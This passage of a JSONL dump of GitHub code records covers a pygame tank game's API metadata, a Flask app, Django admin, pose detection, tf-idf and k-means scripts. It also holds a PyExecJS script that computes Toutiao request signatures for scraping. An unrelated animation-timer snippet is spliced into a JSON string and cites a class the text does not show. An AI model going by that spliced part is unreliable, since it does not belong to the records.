"usage_type": "call"}, {"api_name": "pygame.image", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 50, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 51, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, 
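The Explosion class in the record above advances animation frames on a millisecond timer; a distilled, illustrative sketch of that pattern (not code from the game):

import pygame

def advance_frame(state, frames, frame_rate=50):
    # state = {'frame': 0, 'last_update': pygame.time.get_ticks()}
    # Returns False once the final frame has been shown.
    now = pygame.time.get_ticks()
    if now - state['last_update'] > frame_rate:
        state['last_update'] = now
        state['frame'] += 1
    return state['frame'] < len(frames)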
"usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 71, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 82, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 101, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 112, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 130, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 130, "usage_type": "attribute"}, {"api_name": "wall.Map", "line_number": 135, "usage_type": "call"}, {"api_name": "wall2.Map", "line_number": 137, "usage_type": "call"}, {"api_name": "food.Food", "line_number": 140, "usage_type": "call"}, {"api_name": 
"myTank.MyTank", "line_number": 143, "usage_type": "call"}, {"api_name": "enemyTank.EnemyTank", "line_number": 149, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.constants", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 172, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 172, "usage_type": "attribute"}, {"api_name": "pygame.constants", "line_number": 174, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 175, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 175, "usage_type": "attribute"}, {"api_name": "pygame.constants", "line_number": 177, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 178, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 178, "usage_type": "attribute"}, {"api_name": "pygame.constants", "line_number": 180, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 181, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 181, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 192, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 192, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 221, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 221, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 222, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 223, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 249, "usage_type": "attribute"}, {"api_name": "pygame.K_x", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 251, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 252, "usage_type": "call"}, {"api_name": "pygame.key.get_pressed", "line_number": 255, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 255, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 286, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 294, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 302, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 310, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 319, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_rect", "line_number": 388, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 388, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 391, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 391, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 395, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 400, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 400, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 409, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 409, 
"usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_rect", "line_number": 411, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 411, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 425, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 425, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 428, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 428, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 439, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 439, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 445, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 445, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 449, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 449, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 454, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 454, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_rect", "line_number": 475, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 475, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 487, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 487, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 491, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 491, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 494, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 494, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 504, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 504, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 507, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 507, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_rect", "line_number": 515, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 515, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 518, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 518, "usage_type": "attribute"}, {"api_name": "wall.Iron", "line_number": 530, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 555, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 555, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 559, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 565, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 565, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 566, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 566, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 567, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 567, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 569, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 569, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 570, "usage_type": "call"}, {"api_name": "os.path", "line_number": 570, 
"usage_type": "attribute"}, {"api_name": "pygame.font.match_font", "line_number": 572, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 572, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 576, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 576, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 591, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 591, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 595, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 595, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 596, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 597, "usage_type": "call"}, {"api_name": "pygame.KEYUP", "line_number": 598, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 608, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 609, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 610, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 610, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 611, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 611, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 614, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 616, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 616, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 617, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 624, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 624, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 635, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 635, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 636, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 643, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 643, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 651, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 652, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 654, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 660, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 661, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 663, "usage_type": "call"}]} +{"seq_id": "35549558770", "text": "from flask import Flask\nfrom flask_cors import CORS\nfrom sqlalchemy import create_engine\nfrom model import UserDao,ImageDao\nfrom service import UserService,ImageService\nfrom view import user_router,image_router\nimport config\n\nclass Services:\n pass\n\ndef create_app(test_config=None):\n app=Flask(__name__)\n\n CORS(app)\n \n if test_config is None:\n app.config.from_pyfile(\"config.py\")\n\n else:\n app.config.update(test_config)\n \n database=create_engine(config.config['DB_URL'],encoding='utf-8',max_overflow=0)\n print(\"데이터베이스 연결 성공!\")\n \n @app.route(\"/ping\",methods=[\"GET\"])\n def ping():\n return \"pong\",200\n \n user_dao=UserDao(database)\n image_dao=ImageDao(database)\n\n services=Services\n \n services.user_service=UserService(user_dao,config=app.config)\n services.image_service=ImageService(image_dao,config=app.config)\n\n user_router(app,services)\n 
image_router(app,services)\n \n\n @app.route(\"/ping\",methods=[\"GET\"])\n def ping():\n return \"pong\",200\n \n return app\n", "repo_name": "Nliker/image_cloud", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 23, "usage_type": "call"}, {"api_name": "config.config", "line_number": 23, "usage_type": "attribute"}, {"api_name": "model.UserDao", "line_number": 30, "usage_type": "call"}, {"api_name": "model.ImageDao", "line_number": 31, "usage_type": "call"}, {"api_name": "service.UserService", "line_number": 35, "usage_type": "call"}, {"api_name": "service.ImageService", "line_number": 36, "usage_type": "call"}, {"api_name": "view.user_router", "line_number": 38, "usage_type": "call"}, {"api_name": "view.image_router", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "29893634617", "text": "# -*- coding = utf-8 -*-\n# @Time: 2022/8/17 22:21\nimport execjs\nimport os\n\n\nos.environ[\"NODE_PATH\"] = \"/usr/local/lib/node_modules/\"\n\n\ndef learn():\n with open('learn_js.js', 'r', encoding='utf-8') as f:\n js = f.read()\n\n js = execjs.compile(js)\n res = js.call('func', '123')\n\n print(res)\n\n\ndef sign2_run():\n url = 'https://www.toutiao.com/hot-event/hot-board/?origin=toutiao_pc'\n with open('sign2.js', 'r', encoding='utf-8') as f:\n js = f.read()\n\n js = execjs.compile(js)\n res = js.call('get_sign', url)\n print(res)\n\n\ndef main():\n sign2_run()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "zyh364267040/spider-JS-APP", "sub_path": "jinritoutiao/learn_pyexecjs.py", "file_name": "learn_pyexecjs.py", "file_ext": "py", "file_size_in_byte": 626, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "execjs.compile", "line_number": 14, "usage_type": "call"}, {"api_name": "execjs.compile", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "31505197653", "text": "from django.contrib import admin\nfrom django.contrib.contenttypes.admin import GenericTabularInline\n\nfrom sv_core.core.com.models import I18n\nfrom .models import Event, EventObject, EventType, Subscriber, EventRuleSet\n\n\nclass I18nInline(GenericTabularInline):\n model = I18n\n\n\nclass EventAdmin(admin.ModelAdmin):\n list_filter = ('event_type',)\n list_display = ('event_type', 'name')\n inlines = [\n I18nInline,\n ]\n\n\nclass EventTypeAdmin(admin.ModelAdmin):\n list_filter = ('event_type',)\n list_display = ('event_type', 'event_type_raw', 'entity_type')\n\n\nadmin.site.register(Event, EventAdmin)\nadmin.site.register(EventType, EventTypeAdmin)\nadmin.site.register(EventObject)\nadmin.site.register(Subscriber)\nadmin.site.register(EventRuleSet)\n", "repo_name": "ekryukov/sv_core", "sub_path": "sv_core/core/evt/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 763, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.contrib.contenttypes.admin.GenericTabularInline", "line_number": 8, "usage_type": "name"}, {"api_name": "sv_core.core.com.models.I18n", "line_number": 9, "usage_type": "name"}, 
{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 20, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Event", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 26, "usage_type": "call"}, {"api_name": "models.EventType", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 26, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 27, "usage_type": "call"}, {"api_name": "models.EventObject", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Subscriber", "line_number": 28, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 29, "usage_type": "call"}, {"api_name": "models.EventRuleSet", "line_number": 29, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "20115718644", "text": "import configparser\n\n\nclass SystemConfig:\n\n def __init__(self, log, config_path):\n self.config = configparser.ConfigParser()\n self.config.read(config_path, 'UTF-8')\n self.log = log\n\n def get_config(self, section, option=None):\n\n if not self.config.has_section(section):\n self.log.error(f'>> {section} is not found')\n return None\n\n if option is None:\n return True\n\n if self.config.has_option(section, option):\n return self.config.get(section, option)\n else:\n self.log.error(f'>> {option} is not found')\n return None\n", "repo_name": "krcc5978/upload_system", "sub_path": "project/system_config.py", "file_name": "system_config.py", "file_ext": "py", "file_size_in_byte": 636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "configparser.ConfigParser", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "41816914453", "text": "import cv2\nimport PoseDetector as pd\nimport ImageOverlayer as io\nimport math\nimport time\nimport numpy as np\n\ndef GetJointAngle(CenterPos,jointPos1, jointPos2) :\n\n theta1=math.atan2((jointPos1[2]-CenterPos[2]), (jointPos1[1]-CenterPos[1]))\n theta2=math.atan2((jointPos2[2]-CenterPos[2]), (jointPos2[1]-CenterPos[1]))\n\n degree= abs(theta2-theta1)*180/math.pi\n\n return degree\n\ndef MatchTwoAngle(lmList): #두 영상으로 비교 예정...\n 
leftUpperBodyAngle={\"LelbowAngle\":[14,16,12],\"LarmpitAngle\":[12,14,24],\"LbodyAngle\":[12,11,24]}\n rightUpperBodyAngle={\"RelbowAngle\":[13,11,15],\"RarmpitAngle\":[11,13,23],\"RbodyAngle\":[11,12,23]}\n\n return False\n\ncap = cv2.VideoCapture(\"Shoulder_1.mp4\")\npTime = 0\ndetector = pd.PoseDetector()\n\nframeCount=cap.get(cv2.CAP_PROP_FRAME_COUNT)\n\nwhile True:\n cTime = time.time()\n success, img = cap.read()\n fps = 1 / (cTime - pTime)\n pTime = cTime\n\n if cap.get(cv2.CAP_PROP_POS_FRAMES) >= frameCount/3 : #현재 프레임 수를 확인 후, 지정된 프레임 이상일 시 동영상에서 스켈렙톤 뽑아내기\n img = detector.findPose(img)\n lmList = detector.findPosition(img)\n\n print(MatchTwoAngle(lmList))\n\n cv2.putText(img, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)\n cv2.imshow(\"image\", img)\n cv2.waitKey(1)\n\n\n#real time\n#\n# webcam = cv2.VideoCapture(0)\n# personFrame = cv2.imread(\"PersonFrame.png\",cv2.IMREAD_UNCHANGED)\n# h,w,_=personFrame.shape\n#\n# overlay=io.ImageOverlayer()\n# if not webcam.isOpened() :\n# exit()\n#\n# while webcam.isOpened():\n# lmList=[]\n# detector = pd.PoseDetector()\n# status, frame = webcam.read()\n#\n# if not status :\n# webcam.waitKey()\n# break\n#\n# BackH,BackW,_=frame.shape\n# added_img=overlay.overlay_transparent(frame,personFrame,int(((BackW-1)/2)-((w-1)/2)),int(((BackH-1)/2)-((h-1)/2)))\n# img = detector.findPose(frame)\n# lmList = detector.findPosition(frame)\n#\n# cv2.imshow(\"frame\",added_img)\n#\n# if cv2.waitKey(10) & 0xFF == ord('q') :\n# break\n#\n# webcam.release()\n# cv2.destroyAllWindows()\n", "repo_name": "songsuyoung/UnityPortfolio", "sub_path": "PycharmProjects/pythonProject/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2131, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "math.atan2", "line_number": 10, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 11, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 23, "usage_type": "call"}, {"api_name": "PoseDetector.PoseDetector", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_COUNT", "line_number": 27, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_POS_FRAMES", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_PLAIN", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "36949155015", "text": "from math import log10\nimport string\nfrom collections import Counter\nimport csv\n\n# Functions section\ndef tokenize(docs):\n \"\"\"\n Compute the tokens for each document.\n Input: a list of strings. Each item is a document to tokenize.\n Output: a list of lists. 
Each item is a list containing the tokens of the\n relative document.\n \"\"\"\n tokens = []\n for doc in docs:\n for punct in string.punctuation:\n doc = doc.replace(punct, \" \")\n split_doc = [ token.lower() for token in doc.split(\" \") if token ]\n tokens.append(split_doc)\n return tokens\n\ndef load_dataset(path)->tuple:\n \"\"\"\n Import the dataset as list of lists.\n Input: path to the file\n Output: dataset, header\n \"\"\"\n dataset = []\n\n with open(path) as f:\n header = f.readline()\n cr = csv.reader(f)\n for r,_ in cr:\n dataset.append(r)\n return header, dataset\n\n\n# Main section\nheader, dataset = load_dataset('reviews.txt')\ntokenized_docs = tokenize(dataset)\n\ntf = []\nfor doc in tokenized_docs:\n tf.append(dict(Counter(doc)))\nprint(tf[0])\n\ndfs={}\nfor row in tokenized_docs:\n local=[]\n for w in row:\n if dfs.get(w) != None:\n if w not in local:\n dfs[w]+=1\n local.append(w)\n else:\n dfs[w]=1\n local.append(w)\n\n\ndfs={k: v for k, v in sorted(dfs.items(), key=lambda item: item[1], reverse=True)}\nidfs = {k:log10(len(dataset)/v) for k,v in dfs.items()}\n\nwords_top = [(k,v) for k,v in idfs.items()]\nprint(words_top[:100])\ntfidf = []\nfor doc in tf:\n tfidf_elem = {}\n for k,v in doc.items():\n tfidf_elem[k] = v*idfs[k]\n tfidf.append(tfidf_elem)\n\n", "repo_name": "lambdavi/data_science_lab", "sub_path": "labs/lab2/es2.py", "file_name": "es2.py", "file_ext": "py", "file_size_in_byte": 1696, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "string.punctuation", "line_number": 16, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 32, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 44, "usage_type": "call"}, {"api_name": "math.log10", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "9237027872", "text": "import pandas as pd\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfields =['num_critic_for_reviews', 'duration','gross','facenumber_in_poster',\n 'budget','movie_facebook_likes','imdb_score']\ndf = pd.read_csv(\"movie_metadata.csv\", usecols=fields)\ndf.dropna(inplace=True)\ndf.reset_index(drop=True, inplace=True)\n# following tutorial:\n# https://towardsdatascience.com/k-means-clustering-with-scikit-learn-6b47a369a83c\nX = np.array([df['gross'],df['imdb_score']]).T\nkm = KMeans(n_clusters=3)\ny_km = km.fit_predict(X)\n\n\n# plot the 3 clusters\nfig = plt.figure()\nplt.xlabel(\"Gross revenue\")\nplt.ylabel(\"IMDB score\")\nplt.scatter(\n X[y_km == 0, 0], X[y_km == 0, 1],\n s=50, c='lightgreen',\n marker='s', edgecolor='black',\n label='cluster 1'\n)\nplt.scatter(\n X[y_km == 1, 0], X[y_km == 1, 1],\n s=50, c='orange',\n marker='o', edgecolor='black',\n label='cluster 2'\n)\nplt.scatter(\n X[y_km == 2, 0], X[y_km == 2, 1],\n s=50, c='lightblue',\n marker='v', edgecolor='black',\n label='cluster 3'\n)\n#plot the centroids\nplt.scatter(\n km.cluster_centers_[:, 0], km.cluster_centers_[:, 1],\n s=250, marker='*',\n c='red', edgecolor='black',\n label='centroids'\n)\nplt.legend(scatterpoints=1)\nplt.grid()\nplt.show()", "repo_name": "jam14j/BookScorePredictor", "sub_path": "clustering.py", "file_name": "clustering.py", "file_ext": "py", "file_size_in_byte": 1280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.array", 
